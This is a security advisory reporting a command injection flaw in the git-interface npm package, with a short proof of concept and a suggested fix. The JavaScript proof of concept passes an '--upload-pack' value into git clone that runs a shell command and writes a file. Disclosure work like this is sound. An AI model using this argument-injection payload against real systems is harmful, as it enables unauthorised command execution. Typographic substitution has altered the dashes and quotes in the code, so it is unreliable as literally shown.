# Command Injection vulnerability in [email protected]

`git-interface` describes itself as a Interface to work with a git repository in node.js

Resources:
* Project’s GitHub source code: https://github.com/yarkeev/git-interface
* Project’s npm package: https://www.npmjs.com/package/git-interface

I’m reporting an OS Command Injection vulnerability in `git-interface` npm package. The API may be abused if user input is able to provide a valid directory on disk and supply the destination directory to clone a repository too.

## Proof of Concept exploit

Install `[email protected]` which is the latest.

Run the following code, with the following precondition, in which the `/tmp/new` directory needs to exist (doesn’t need to be a .git initialized directory though), and so, you could provide a predictable path like say `/usr/src`:

“`js
const { Git } = require(‘git-interface’);

const git = new Git({
dir: ‘/tmp/new’ //default path is current directory
});

git.clone(‘file:///tmp/new’, ‘–upload-pack=echo>/tmp/pwned’);
“`

Observe a new file created: `/tmp/pwned`

# Mitigation suggestions

Use the shell `–` notation as a suffix of the supported command-line arguments (if at all), to then make sure that input passed to the git command is positional arguments rather than command-line arguments. For example: `git clone — ` would prevent path and destination from being interpreted as command-line arguments for the git command.

# Author

Liran Tal